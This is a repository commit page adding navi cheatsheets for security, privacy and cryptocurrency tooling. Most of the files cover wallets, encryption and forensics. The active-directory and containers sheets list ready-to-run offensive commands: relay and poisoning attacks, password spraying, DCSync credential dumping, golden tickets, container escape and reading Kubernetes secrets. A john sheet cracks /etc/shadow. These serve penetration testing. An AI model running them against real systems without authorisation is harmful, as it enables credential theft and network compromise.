djedi/cypherpunk-cheats
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Initial cypherpunk-cheats collection: 22 navi cheatsheets

Browse source
This commit is contained in:
rpriven 2026-01-04 15:05:38 -07:00
commit 0fc9b49c22
Signed by: djedi
GPG key ID: D04DED574622EF45
25 changed files with 2296 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
.gitignore vendored Normal file
View file

@ -0,0 +1,14 @@
# OS
.DS_Store
Thumbs.db
# Editors
*.swp
*.swo
*~
.vscode/
.idea/
# Temp files
*.tmp
*.bak

21
LICENSE Normal file
View file

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2025 rpriven
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

104
README.md Normal file
View file

@ -0,0 +1,104 @@
# Cypherpunk Cheats
Navi-compatible cheatsheets for security, privacy, and digital sovereignty.
## Installation
```bash
# Install navi
cargo install navi
# Or via package manager
sudo apt install navi # Debian/Ubuntu
brew install navi # macOS
# Add this repo to navi (choose one)
navi repo add https://github.com/rpriven/cypherpunk-cheats # GitHub
navi repo add https://git.djeditech.com/djedi/cypherpunk-cheats # Mirror
```
## Manual Setup
Add to your navi config (`~/.config/navi/config.yaml`):
```yaml
cheats:
paths:
- /path/to/cypherpunk-cheats
```
## Usage
```bash
# Launch navi
navi
# Query specific topic
navi --query "nmap"
navi --query "monero"
navi --query "luks"
# Preview mode
navi --preview
# Use with custom path
navi --path /path/to/cypherpunk-cheats
```
## Categories
### Offensive Security
| File | Description |
|------|-------------|
| `nmap.cheat` | Port scanning and service enumeration |
| `web.cheat` | Web application testing (ffuf, sqlmap, nikto) |
| `hashcat.cheat` | Password cracking with Hashcat |
| `john.cheat` | John the Ripper password cracking |
| `privesc-linux.cheat` | Linux privilege escalation |
| `privesc-windows.cheat` | Windows privilege escalation |
| `active-directory.cheat` | AD attacks (NetExec, Kerberoasting) |
| `containers.cheat` | Docker/Kubernetes security |
| `wireless.cheat` | WiFi attacks (aircrack-ng, WPA cracking) |
| `tunnels.cheat` | SSH tunnels, chisel, pivoting |
### DFIR & Analysis
| File | Description |
|------|-------------|
| `forensics.cheat` | Volatility, disk imaging, evidence collection |
| `osint.cheat` | Sherlock, theHarvester, recon-ng |
| `wireshark.cheat` | Packet analysis (tshark, tcpdump) |
| `reversing.cheat` | Ghidra, radare2, GDB, binary analysis |
| `steganography.cheat` | Hidden data extraction (steghide, binwalk) |
### Privacy & Encryption
| File | Description |
|------|-------------|
| `privacy.cheat` | Tor, GPG, age encryption, metadata removal |
| `luks.cheat` | Full disk encryption (LUKS, dm-crypt) |
| `pass.cheat` | Password managers (pass, KeePassXC) |
| `secure-comms.cheat` | Signal CLI, Matrix, encrypted messaging |
### Cryptocurrency & Web3
| File | Description |
|------|-------------|
| `monero.cheat` | Monero CLI wallet operations |
| `bitcoin.cheat` | Bitcoin Core CLI operations |
| `solidity.cheat` | Smart contract auditing (Slither, Foundry) |
## Philosophy
Built for cypherpunks who value:
- **Privacy** - Default to encrypted, anonymous, and sovereign
- **Security** - Offensive knowledge for defensive thinking
- **Freedom** - Tools for digital self-determination
## Contributing
PRs welcome! Follow the navi `.cheat` format:
- `%` tags for categories
- `#` comments for descriptions
- `$` for argument completion
## License
MIT

75
active-directory.cheat Normal file
View file

@ -0,0 +1,75 @@
% ad, active-directory, kerberos, windows, netexec
# Start Responder (LLMNR/NBT-NS poisoning)
sudo responder -I <interface> -dwPv
# SMB relay attack
sudo ntlmrelayx.py -tf targets.txt -smb2support
# Get domain users (NetExec - replacement for crackmapexec)
nxc smb <dc_ip> -u <username> -p <password> --users
# Get domain groups
nxc smb <dc_ip> -u <username> -p <password> --groups
# Password spray
nxc smb <dc_ip> -u users.txt -p '<password>' --continue-on-success
# Password spray multiple passwords
nxc smb <dc_ip> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
# Kerberoasting - Get TGS tickets
GetUserSPNs.py <domain>/<username>:<password> -dc-ip <dc_ip> -request
# AS-REP Roasting
GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat
# Dump secrets (admin required)
secretsdump.py <domain>/<username>:<password>@<target>
# Pass the hash
psexec.py <domain>/<username>@<target> -hashes <lmhash>:<nthash>
# Pass the hash with NetExec
nxc smb <target> -u <username> -H <nthash>
# DCSync attack
secretsdump.py <domain>/<username>:<password>@<dc_ip> -just-dc
# Get shell with psexec
psexec.py <domain>/<username>:<password>@<target>
# Get shell with wmiexec
wmiexec.py <domain>/<username>:<password>@<target>
# Get shell with evil-winrm
evil-winrm -i <target> -u <username> -p <password>
# BloodHound collection
bloodhound-python -d <domain> -u <username> -p <password> -c all -ns <dc_ip>
# PowerView - Get domain info
Import-Module .\PowerView.ps1; Get-Domain
# PowerView - Get domain users
Get-DomainUser | select samaccountname
# PowerView - Get domain computers
Get-DomainComputer | select name
# PowerView - Find domain admins
Get-DomainGroupMember "Domain Admins"
# Golden ticket with mimikatz
mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ptt" "exit"
# Silver ticket
mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /target:<target> /service:<service> /rc4:<service_hash> /ptt" "exit"
$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
$ dc_ip: echo ""
$ domain: echo ""
$ username: echo ""
$ password: echo ""
$ target: echo ""
$ nthash: echo ""

132
bitcoin.cheat Normal file
View file

@ -0,0 +1,132 @@
% bitcoin, btc, cryptocurrency, wallet
# Start Bitcoin daemon
bitcoind
# Start daemon with options
bitcoind -daemon -server
# Stop daemon
bitcoin-cli stop
# Get blockchain info
bitcoin-cli getblockchaininfo
# Get network info
bitcoin-cli getnetworkinfo
# Get wallet info
bitcoin-cli getwalletinfo
# Create new wallet
bitcoin-cli createwallet "<wallet_name>"
# Load wallet
bitcoin-cli loadwallet "<wallet_name>"
# List wallets
bitcoin-cli listwallets
# Generate new address
bitcoin-cli getnewaddress
# Generate new address with label
bitcoin-cli getnewaddress "<label>"
# Get balance
bitcoin-cli getbalance
# List unspent outputs
bitcoin-cli listunspent
# List transactions
bitcoin-cli listtransactions
# Get transaction details
bitcoin-cli gettransaction "<txid>"
# Send to address
bitcoin-cli sendtoaddress "<address>" <amount>
# Send with fee rate
bitcoin-cli sendtoaddress "<address>" <amount> "" "" false true null "unset" null <fee_rate>
# Create raw transaction
bitcoin-cli createrawtransaction '[{"txid":"<txid>","vout":<vout>}]' '{"<address>":<amount>}'
# Sign raw transaction
bitcoin-cli signrawtransactionwithwallet "<hex>"
# Send raw transaction
bitcoin-cli sendrawtransaction "<hex>"
# Estimate fee (blocks to confirm)
bitcoin-cli estimatesmartfee <blocks>
# Dump private key (WIF)
bitcoin-cli dumpprivkey "<address>"
# Import private key
bitcoin-cli importprivkey "<wif_key>"
# Backup wallet
bitcoin-cli backupwallet "<backup_path>"
# Encrypt wallet
bitcoin-cli encryptwallet "<passphrase>"
# Unlock wallet (seconds)
bitcoin-cli walletpassphrase "<passphrase>" <timeout>
# Lock wallet
bitcoin-cli walletlock
# Get block hash
bitcoin-cli getblockhash <height>
# Get block data
bitcoin-cli getblock "<blockhash>"
# Decode raw transaction
bitcoin-cli decoderawtransaction "<hex>"
# Verify message signature
bitcoin-cli verifymessage "<address>" "<signature>" "<message>"
# Sign message
bitcoin-cli signmessage "<address>" "<message>"
# Sparrow Wallet (GUI - recommended)
sparrow
# Electrum (lightweight wallet)
electrum
# Hardware wallet - Trezor
trezorctl list
trezorctl get-address -n "m/84'/0'/0'/0/0"
# Hardware wallet - Ledger
# Use Ledger Live or HWI
# Bitcoin Core config (~/.bitcoin/bitcoin.conf)
# server=1
# rpcuser=user
# rpcpassword=pass
# txindex=1
$ wallet_name: bitcoin-cli listwallets 2>/dev/null | jq -r '.[]' 2>/dev/null
$ label: echo "main"
$ txid: echo ""
$ address: echo ""
$ amount: echo "0.001"
$ fee_rate: echo "10"
$ vout: echo "0"
$ hex: echo ""
$ wif_key: echo ""
$ backup_path: echo "wallet_backup.dat"
$ passphrase: echo ""
$ timeout: echo "60"
$ height: echo "0"
$ blockhash: echo ""
$ blocks: echo "6"

67
containers.cheat Normal file
View file

@ -0,0 +1,67 @@
% docker, kubernetes, containers, escape
# Check if inside container
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker
# List docker images
docker images
# List running containers
docker ps
# List all containers
docker ps -a
# Execute into container
docker exec -it <container_id> /bin/bash
# Inspect container
docker inspect <container_id>
# Docker socket escape (if socket mounted)
docker run -v /:/hostfs -it alpine chroot /hostfs
# Privileged container escape - mount host
mkdir /mnt/host && mount /dev/sda1 /mnt/host
# Check capabilities
capsh --print
# Kubernetes - get pods
kubectl get pods
# Kubernetes - get all namespaces
kubectl get namespaces
# Kubernetes - get pods all namespaces
kubectl get pods --all-namespaces
# Kubernetes - get secrets
kubectl get secrets
# Kubernetes - decode secret
kubectl get secret <secret_name> -o yaml
# Kubernetes - exec into pod
kubectl exec -it <pod_name> -- /bin/bash
# Get service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Check RBAC permissions
kubectl auth can-i --list
# Trivy - scan image
trivy image <image_name>
# Deepce - Docker enumeration
./deepce.sh
# CDK - container pentest toolkit
./cdk evaluate
$ container_id: docker ps --format "{{.ID}}\t{{.Names}}" 2>/dev/null
$ pod_name: kubectl get pods --no-headers 2>/dev/null | awk '{print $1}'
$ secret_name: kubectl get secrets --no-headers 2>/dev/null | awk '{print $1}'
$ image_name: docker images --format "{{.Repository}}:{{.Tag}}" 2>/dev/null

97
forensics.cheat Normal file
View file

@ -0,0 +1,97 @@
% forensics, dfir, volatility, memory, incident-response
# Volatility 3 - identify OS
vol -f <memory_dump> windows.info
# Volatility 3 - process list
vol -f <memory_dump> windows.pslist
# Volatility 3 - process tree
vol -f <memory_dump> windows.pstree
# Volatility 3 - hidden processes
vol -f <memory_dump> windows.psscan
# Volatility 3 - network connections
vol -f <memory_dump> windows.netscan
# Volatility 3 - command line history
vol -f <memory_dump> windows.cmdline
# Volatility 3 - DLLs for process
vol -f <memory_dump> windows.dlllist --pid <pid>
# Volatility 3 - malware detection
vol -f <memory_dump> windows.malfind
# Volatility 3 - registry hives
vol -f <memory_dump> windows.registry.hivelist
# Volatility 3 - dump process memory
vol -f <memory_dump> windows.memmap --pid <pid> --dump
# Volatility 2 - image info (legacy)
volatility -f <memory_dump> imageinfo
# Volatility 2 - with profile
volatility -f <memory_dump> --profile=<profile> pslist
# Disk imaging with dd
sudo dd if=<source_device> of=<output_file> bs=64K conv=noerror,sync status=progress
# Disk imaging with dcfldd (forensic)
sudo dcfldd if=<source_device> of=<output_file> hash=md5,sha256 hashlog=hashes.txt
# Mount forensic image read-only
sudo mount -o ro,loop,noexec <image_file> <mount_point>
# Mount with offset (partition)
sudo mount -o ro,loop,offset=$((512*<sector_offset>)) <image_file> <mount_point>
# File carving with foremost
foremost -i <image_file> -o <output_dir>
# File recovery with photorec
photorec <image_file>
# File recovery with scalpel
scalpel -c /etc/scalpel/scalpel.conf -o <output_dir> <image_file>
# Timeline with plaso
log2timeline.py <output.plaso> <evidence_source>
# Parse plaso timeline
psort.py -o l2tcsv <output.plaso> -w timeline.csv
# Extract strings from binary
strings -n 8 <file>
strings -e l <file>
# Calculate file hashes
md5sum <file> && sha256sum <file>
# Chainsaw - Windows event log hunting
chainsaw hunt <evtx_dir> --rules <sigma_rules_dir>
# Parse Windows prefetch
PECmd.exe -d C:\Windows\Prefetch --csv <output_dir>
# Registry analysis with RegRipper
rip.pl -r <registry_hive> -p all
# KAPE collection
kape.exe --tsource C: --tdest <output_dir> --target !SANS_Triage
# Autopsy (GUI forensics)
autopsy
$ memory_dump: find . -name "*.raw" -o -name "*.mem" -o -name "*.dmp" 2>/dev/null
$ source_device: lsblk -dpno NAME | head -5
$ output_file: echo "disk.raw"
$ image_file: find . -name "*.raw" -o -name "*.dd" -o -name "*.img" 2>/dev/null
$ mount_point: echo "/mnt/evidence"
$ output_dir: echo "output"
$ pid: echo ""
$ profile: echo "Win10x64_19041"
$ sector_offset: echo "2048"
$ evtx_dir: echo "/path/to/evtx"

50
hashcat.cheat Normal file
View file

@ -0,0 +1,50 @@
% hashcat, cracking, passwords
# Crack MD5 hash
hashcat -m 0 <hashfile> <wordlist> -O
# Crack NTLM hash
hashcat -m 1000 <hashfile> <wordlist> -O
# Crack NTLMv2 (Responder capture)
hashcat -m 5600 <hashfile> <wordlist> -O
# Crack SHA-512 Linux ($6$)
hashcat -m 1800 <hashfile> <wordlist> -O
# Crack Kerberoasting TGS
hashcat -m 13100 <hashfile> <wordlist> -O
# Crack AS-REP Roast
hashcat -m 18200 <hashfile> <wordlist> -O
# Crack WPA2
hashcat -m 22000 <hashfile> <wordlist> -O
# Crack bcrypt
hashcat -m 3200 <hashfile> <wordlist> -O
# Crack JWT
hashcat -m 16500 <hashfile> <wordlist> -O
# With rules (best64)
hashcat -m <mode> <hashfile> <wordlist> -r /usr/share/hashcat/rules/best64.rule -O
# Mask attack - 4 digits
hashcat -m <mode> <hashfile> -a 3 ?d?d?d?d
# Mask attack - 8 lowercase
hashcat -m <mode> <hashfile> -a 3 ?l?l?l?l?l?l?l?l
# Mask attack - Password1! pattern
hashcat -m <mode> <hashfile> -a 3 ?u?l?l?l?l?l?l?l?d?s
# Show cracked passwords
hashcat -m <mode> <hashfile> --show
# Resume session
hashcat --restore
$ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
$ mode: echo "0\n100\n1000\n1400\n1700\n1800\n3200\n5600\n13100\n18200" --- --header "Mode: 0=MD5, 100=SHA1, 1000=NTLM, 1400=SHA256, 1700=SHA512, 1800=sha512crypt, 3200=bcrypt, 5600=NTLMv2, 13100=Kerberoast, 18200=AS-REP"

58
john.cheat Normal file
View file

@ -0,0 +1,58 @@
% john, cracking, passwords
# Auto-detect and crack
john <hashfile>
# Crack with wordlist
john --wordlist=<wordlist> <hashfile>
# Crack NTLM
john --format=nt --wordlist=<wordlist> <hashfile>
# Crack MD5
john --format=raw-md5 --wordlist=<wordlist> <hashfile>
# Crack SHA-512 Linux
john --format=sha512crypt --wordlist=<wordlist> <hashfile>
# Crack bcrypt
john --format=bcrypt --wordlist=<wordlist> <hashfile>
# Show cracked passwords
john --show <hashfile>
# With rules
john --wordlist=<wordlist> --rules <hashfile>
# SSH key crack
ssh2john <ssh_key> > ssh_hash.txt && john --wordlist=<wordlist> ssh_hash.txt
# ZIP file crack
zip2john <zip_file> > zip_hash.txt && john --wordlist=<wordlist> zip_hash.txt
# RAR file crack
rar2john <rar_file> > rar_hash.txt && john --wordlist=<wordlist> rar_hash.txt
# PDF crack
pdf2john <pdf_file> > pdf_hash.txt && john --wordlist=<wordlist> pdf_hash.txt
# Office document crack
office2john <office_file> > office_hash.txt && john --wordlist=<wordlist> office_hash.txt
# KeePass crack
keepass2john <kdbx_file> > keepass_hash.txt && john --wordlist=<wordlist> keepass_hash.txt
# Linux shadow file
unshadow /etc/passwd /etc/shadow > unshadowed.txt && john --wordlist=<wordlist> unshadowed.txt
# List available formats
john --list=formats
$ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
$ ssh_key: find . -name "id_rsa" -o -name "*.pem" 2>/dev/null
$ zip_file: find . -name "*.zip" 2>/dev/null
$ rar_file: find . -name "*.rar" 2>/dev/null
$ pdf_file: find . -name "*.pdf" 2>/dev/null
$ office_file: find . -name "*.docx" -o -name "*.xlsx" 2>/dev/null
$ kdbx_file: find . -name "*.kdbx" 2>/dev/null

124
luks.cheat Normal file
View file

@ -0,0 +1,124 @@
% luks, encryption, disk, dm-crypt, fde
# Check if device is LUKS
sudo cryptsetup isLuks <device>
# LUKS info
sudo cryptsetup luksDump <device>
# Create LUKS volume
sudo cryptsetup luksFormat <device>
# Create LUKS2 volume (recommended)
sudo cryptsetup luksFormat --type luks2 <device>
# Create LUKS with specific cipher
sudo cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 512 --hash sha512 <device>
# Open LUKS volume
sudo cryptsetup luksOpen <device> <mapper_name>
# Open LUKS (alternative syntax)
sudo cryptsetup open <device> <mapper_name>
# Close LUKS volume
sudo cryptsetup luksClose <mapper_name>
# Add key to LUKS
sudo cryptsetup luksAddKey <device>
# Add key from file
sudo cryptsetup luksAddKey <device> <keyfile>
# Remove key
sudo cryptsetup luksRemoveKey <device>
# Kill key slot
sudo cryptsetup luksKillSlot <device> <slot_number>
# Change passphrase
sudo cryptsetup luksChangeKey <device>
# Create filesystem on opened LUKS
sudo mkfs.ext4 /dev/mapper/<mapper_name>
# Mount LUKS volume
sudo mount /dev/mapper/<mapper_name> <mount_point>
# Unmount LUKS volume
sudo umount <mount_point>
sudo cryptsetup luksClose <mapper_name>
# Create encrypted file container
dd if=/dev/zero of=<container_file> bs=1M count=<size_mb>
sudo cryptsetup luksFormat <container_file>
sudo cryptsetup luksOpen <container_file> <mapper_name>
sudo mkfs.ext4 /dev/mapper/<mapper_name>
# Backup LUKS header
sudo cryptsetup luksHeaderBackup <device> --header-backup-file <backup_file>
# Restore LUKS header
sudo cryptsetup luksHeaderRestore <device> --header-backup-file <backup_file>
# Erase LUKS header (DESTROYS DATA!)
sudo cryptsetup luksErase <device>
# Check LUKS status
sudo cryptsetup status <mapper_name>
# Benchmark encryption
cryptsetup benchmark
# Auto-mount with /etc/crypttab
# <mapper_name> <device> none luks
# Auto-mount with keyfile
# <mapper_name> <device> <keyfile> luks
# Full disk encryption install (Ubuntu)
# Select "Encrypt the new Ubuntu installation" during install
# Encrypt home directory (ecryptfs - legacy)
sudo apt install ecryptfs-utils
ecryptfs-migrate-home -u <username>
# LUKS on LVM
sudo pvcreate /dev/mapper/<mapper_name>
sudo vgcreate <vg_name> /dev/mapper/<mapper_name>
sudo lvcreate -l 100%FREE -n <lv_name> <vg_name>
# Resize LUKS volume (grow)
sudo cryptsetup resize <mapper_name>
sudo resize2fs /dev/mapper/<mapper_name>
# Create encrypted swap
sudo cryptsetup luksFormat <swap_device>
sudo cryptsetup luksOpen <swap_device> cryptswap
sudo mkswap /dev/mapper/cryptswap
sudo swapon /dev/mapper/cryptswap
# VeraCrypt CLI - create volume
veracrypt -t -c
# VeraCrypt CLI - mount
veracrypt <volume_file> <mount_point>
# VeraCrypt CLI - dismount
veracrypt -d
# VeraCrypt CLI - list mounted
veracrypt -l
$ device: lsblk -dpno NAME | grep -v loop
$ mapper_name: ls /dev/mapper 2>/dev/null | grep -v control
$ mount_point: echo "/mnt/encrypted"
$ keyfile: echo "/root/keyfile"
$ backup_file: echo "luks_header.backup"
$ container_file: echo "encrypted_container.img"
$ size_mb: echo "1024"
$ slot_number: echo "0\n1\n2\n3\n4\n5\n6\n7"
$ username: whoami
$ vg_name: echo "encrypted_vg"
$ lv_name: echo "data"
$ volume_file: find ~ -name "*.hc" -o -name "*.tc" 2>/dev/null | head -5

121
monero.cheat Normal file
View file

@ -0,0 +1,121 @@
% monero, xmr, cryptocurrency, wallet
# Start Monero daemon
monerod
# Start daemon with remote node (no local blockchain)
monerod --bootstrap-daemon-address auto
# Start wallet CLI
monero-wallet-cli
# Create new wallet
monero-wallet-cli --generate-new-wallet <wallet_name>
# Open existing wallet
monero-wallet-cli --wallet-file <wallet_file>
# Connect to remote node
monero-wallet-cli --daemon-address <node_address>
# Restore wallet from seed
monero-wallet-cli --restore-deterministic-wallet
# Restore from keys
monero-wallet-cli --generate-from-keys <wallet_name>
# Check balance (in wallet)
balance
# Check unlocked balance
balance unlocked
# Get wallet address
address
# Get all addresses (subaddresses)
address all
# Create new subaddress
address new <label>
# Show seed (KEEP SECRET!)
seed
# Show private keys (KEEP SECRET!)
spendkey
viewkey
# Transfer XMR
transfer <address> <amount>
# Transfer with priority
transfer <priority> <address> <amount>
# Sweep all to address
sweep_all <address>
# Show transaction history
show_transfers
# Show incoming transfers
show_transfers in
# Show outgoing transfers
show_transfers out
# Show pending transfers
show_transfers pending
# Check transaction status
show_transfer <txid>
# Export outputs (for hardware wallet)
export_outputs outputs.txt
# Import outputs
import_outputs outputs.txt
# Export key images
export_key_images key_images.txt
# Sign message with wallet
sign <message>
# Verify signed message
verify <address> <signature> <message>
# Rescan blockchain
rescan_bc
# Rescan spent outputs
rescan_spent
# Refresh wallet
refresh
# Set daemon address
set_daemon <node_address>
# Check daemon status
status
# Get fee estimate
fee
# Stop wallet
exit
# Public remote nodes (use with caution)
# node.moneroworld.com:18089
# nodes.hashvault.pro:18081
# xmr-node.cakewallet.com:18081
$ wallet_name: echo "my_wallet"
$ wallet_file: find ~ -name "*.keys" 2>/dev/null | head -5
$ node_address: echo "node.moneroworld.com:18089"
$ address: echo ""
$ amount: echo "0.1"
$ priority: echo "0\n1\n2\n3\n4" --- --header "0=default, 1=unimportant, 2=normal, 3=elevated, 4=priority"
$ txid: echo ""
$ label: echo "donation"

53
nmap.cheat Normal file
View file

@ -0,0 +1,53 @@
% nmap, scanning, recon
# Quick SYN scan (top 1000 ports)
nmap -sS <target>
# Full port scan (all 65535)
nmap -sS -p- <target>
# Service version detection
nmap -sV <target>
# OS detection
nmap -O <target>
# Aggressive scan (OS, version, scripts, traceroute)
nmap -A <target>
# UDP scan (top ports)
nmap -sU --top-ports 20 <target>
# Script scan (default scripts)
nmap -sC <target>
# Vulnerability scan
nmap --script vuln <target>
# SMB enumeration
nmap --script smb-enum-shares,smb-enum-users -p 445 <target>
# HTTP enumeration
nmap --script http-enum -p 80,443 <target>
# Full comprehensive scan
nmap -sS -sV -sC -O -p- -oA scan_<target> <target>
# Scan multiple targets from file
nmap -iL <targets_file>
# Fast scan (top 100 ports)
nmap -F <target>
# Ping sweep (host discovery)
nmap -sn <network_cidr>
# Skip ping (scan even if host appears down)
nmap -Pn <target>
# Output all formats
nmap -sS -sV -oA output_<target> <target>
$ target: echo ""
$ targets_file: find . -name "*.txt" -type f 2>/dev/null
$ network_cidr: echo "192.168.1.0/24"

106
osint.cheat Normal file
View file

@ -0,0 +1,106 @@
% osint, recon, reconnaissance, intelligence
# Sherlock - username search
sherlock <username>
# Sherlock - multiple usernames
sherlock <username1> <username2> <username3>
# Maigret - username search (better)
maigret <username>
# theHarvester - all sources
theHarvester -d <domain> -b all
# theHarvester - specific sources
theHarvester -d <domain> -b google,linkedin,twitter
# Subfinder - subdomain enumeration
subfinder -d <domain>
# Subfinder - with output
subfinder -d <domain> -o subdomains.txt
# Amass - subdomain enum
amass enum -d <domain>
# Amass - passive only
amass enum -passive -d <domain>
# Certificate transparency lookup
curl -s "https://crt.sh/?q=%.<domain>&output=json" | jq -r '.[].name_value' | sort -u
# DNS enumeration
dig <domain> ANY
dig <domain> MX
dig <domain> TXT
# Zone transfer attempt
dig axfr @<nameserver> <domain>
# Whois lookup
whois <domain>
# Reverse whois (by email)
# Use viewdns.info or whoxy.com
# Google dorking - site specific
# site:<domain> filetype:pdf
# Google dorking - login pages
# site:<domain> inurl:login OR inurl:admin
# Google dorking - exposed files
# site:<domain> filetype:sql OR filetype:env OR filetype:log
# Wayback machine URLs
waybackurls <domain>
# GitHub dorking - secrets
# org:<company> password OR api_key OR secret
# Shodan - host info
shodan host <ip>
# Shodan - search
shodan search "hostname:<domain>"
# Shodan - org search
shodan search 'org:"<company_name>"'
# Email verification
curl "https://api.hunter.io/v2/email-verifier?email=<email>&api_key=<api_key>"
# SpiderFoot scan
spiderfoot -s <target> -o output.html
# Recon-ng
recon-ng
# Then: marketplace install all
# workspaces create <name>
# modules load recon/domains-hosts/hackertarget
# Social media - Instagram OSINT
# instaloader <username>
# Image reverse search
# Google Images, TinEye, Yandex
# Metadata extraction
exiftool <image>
# GPS from image
exiftool -gpslatitude -gpslongitude <image>
# Check if email is breached
# haveibeenpwned.com API or dehashed.com
$ username: echo ""
$ domain: echo ""
$ ip: echo ""
$ nameserver: echo ""
$ company_name: echo ""
$ email: echo ""
$ api_key: echo ""
$ target: echo ""
$ image: find . -name "*.jpg" -o -name "*.png" 2>/dev/null | head -5

134
pass.cheat Normal file
View file

@ -0,0 +1,134 @@
% pass, password-manager, gpg, keepass
# Initialize password store
pass init <gpg_key_id>
# Initialize with git
pass git init
# List all passwords
pass
# List passwords in folder
pass <folder>
# Show password
pass <entry>
# Show password (clipboard, 45 sec)
pass -c <entry>
# Generate new password
pass generate <entry> <length>
# Generate without symbols
pass generate -n <entry> <length>
# Generate and copy to clipboard
pass generate -c <entry> <length>
# Insert password manually
pass insert <entry>
# Insert multiline
pass insert -m <entry>
# Edit password
pass edit <entry>
# Remove password
pass rm <entry>
# Move/rename password
pass mv <old_entry> <new_entry>
# Copy password entry
pass cp <entry> <new_entry>
# Find password
pass find <search_term>
# Search in passwords
pass grep <search_term>
# Git push changes
pass git push
# Git pull changes
pass git pull
# Git status
pass git status
# Import from KeePass
pass import keepass <kdbx_file>
# Export to KeePass (manual or script)
# pass show <entry> and import to KeePass
# KeePassXC CLI - open database
keepassxc-cli open <database>
# KeePassXC CLI - list entries
keepassxc-cli ls <database>
# KeePassXC CLI - show entry
keepassxc-cli show <database> <entry>
# KeePassXC CLI - show password only
keepassxc-cli show -s <database> <entry>
# KeePassXC CLI - add entry
keepassxc-cli add <database> <entry>
# KeePassXC CLI - generate password
keepassxc-cli generate -L <length>
# KeePassXC CLI - clip password
keepassxc-cli clip <database> <entry>
# Bitwarden CLI - login
bw login
# Bitwarden CLI - unlock
bw unlock
# Bitwarden CLI - list items
bw list items
# Bitwarden CLI - get password
bw get password <item_id>
# Bitwarden CLI - create item
bw create item <json_data>
# Bitwarden CLI - sync
bw sync
# gopass (pass compatible with teams)
gopass
# gopass - init with multiple keys
gopass init <key1> <key2>
# gopass - recipient add
gopass recipients add <gpg_key_id>
# Rofi integration (pass menu)
rofi-pass
# Dmenu integration
passmenu
# Browser integration
# browserpass extension + browserpass-native
$ gpg_key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
$ entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
$ folder: pass 2>/dev/null | grep -v "Password Store" | grep "/" | head -5 | sed 's/[├│└──]//g' | tr -d ' '
$ length: echo "20\n32\n64"
$ old_entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
$ new_entry: echo ""
$ search_term: echo ""
$ kdbx_file: find ~ -name "*.kdbx" 2>/dev/null | head -5
$ database: find ~ -name "*.kdbx" 2>/dev/null | head -5

128
privacy.cheat Normal file
View file

@ -0,0 +1,128 @@
% privacy, encryption, tor, gpg, pets
# Generate GPG key pair
gpg --full-generate-key
# List GPG keys
gpg --list-keys
# List secret keys
gpg --list-secret-keys
# Export public key
gpg --armor --export <key_id> > public.asc
# Export private key (backup)
gpg --armor --export-secret-keys <key_id> > private.asc
# Import a key
gpg --import <keyfile>
# Encrypt file with GPG (symmetric)
gpg -c <file>
# Encrypt file for recipient
gpg -e -r <recipient_email> <file>
# Decrypt GPG file
gpg -d <file.gpg> > <output_file>
# Sign a file
gpg --sign <file>
# Verify signature
gpg --verify <file.sig>
# Age encryption - generate key
age-keygen -o key.txt
# Age encrypt file
age -r <public_key> -o <file.age> <file>
# Age decrypt file
age -d -i key.txt -o <output> <file.age>
# Age encrypt with passphrase
age -p -o <file.age> <file>
# Start Tor service
sudo systemctl start tor
# Check Tor status
sudo systemctl status tor
# Torify a command
torify <command>
# Use torsocks
torsocks curl https://check.torproject.org
# Get new Tor circuit
sudo killall -HUP tor
# Check if using Tor
curl --socks5 localhost:9050 https://check.torproject.org/api/ip
# I2P - start router
i2prouter start
# I2P - check status
i2prouter status
# Secure delete file (shred)
shred -vfz -n 5 <file>
# Secure delete with srm
srm -vz <file>
# Wipe free space
sfill -v <mountpoint>
# BleachBit clean
bleachbit --clean system.cache system.tmp
# Veracrypt create volume
veracrypt -t -c
# Veracrypt mount volume
veracrypt <volume_file> <mount_point>
# Veracrypt dismount
veracrypt -d <mount_point>
# Check for listening services
ss -tulpn
# Block all incoming (UFW)
sudo ufw default deny incoming && sudo ufw enable
# MAC address randomization
sudo macchanger -r <interface>
# Reset MAC to permanent
sudo macchanger -p <interface>
# DNS over HTTPS test
curl -H 'accept: application/dns-json' 'https://cloudflare-dns.com/dns-query?name=example.com&type=A'
# Check DNS leaks
curl https://dnsleaktest.com/
# Metadata removal from image
exiftool -all= <image>
# Metadata removal from PDF
exiftool -all:all= <pdf>
# MAT2 metadata removal
mat2 <file>
# Check what metadata exists
exiftool <file>
